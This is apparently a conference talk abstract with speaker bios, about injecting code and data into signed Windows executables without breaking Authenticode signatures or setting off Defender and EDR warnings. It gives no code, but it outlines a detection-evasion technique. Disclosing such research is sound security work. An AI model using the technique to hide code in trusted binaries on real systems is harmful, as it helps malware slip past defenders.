Could a signed Windows executable be modified without breaking the signature? Everyone told me “no”, so I built a set of tools that does exactly that. Lets talk Authenticode, PE/COFF and the limitations that allow one to inject data and code without breaking signatures or triggering Defender and EDR warnings. Then, see what you can do with that “feature”.
Description:
An ability to inject custom code and data into signed executables can help bypass detection as EDR’s consider properly signed code to be low risk. These executables can be used to hide data in plain sight, while developers can use the same technique to build secure products that simplify user experience. For example, by using a single signed executable and adding configuration parameters after signing.
About the speakers
Alex Ivkin leads a solutions group at Eclypsium, a US security startup. His focus is on researching secure deployments of (in)secure software, including container orchestration, application security, and firmware security. Alex has two decades of security evaluation experience, delivered security trainings, holds MS in Computer Science, co-authored security certifications and climbs mountains in his spare time.
Alexei Kojenov began his career as a software developer. A decade later, he realized that breaking code was way more fun than writing code, and decided to switch direction. He is now a full-time application security professional, with vast experience of assisting engineering teams in delivering secure code, currently working for Google. Outside his day job, Alexei enjoys doing security research and speaking at various conferences.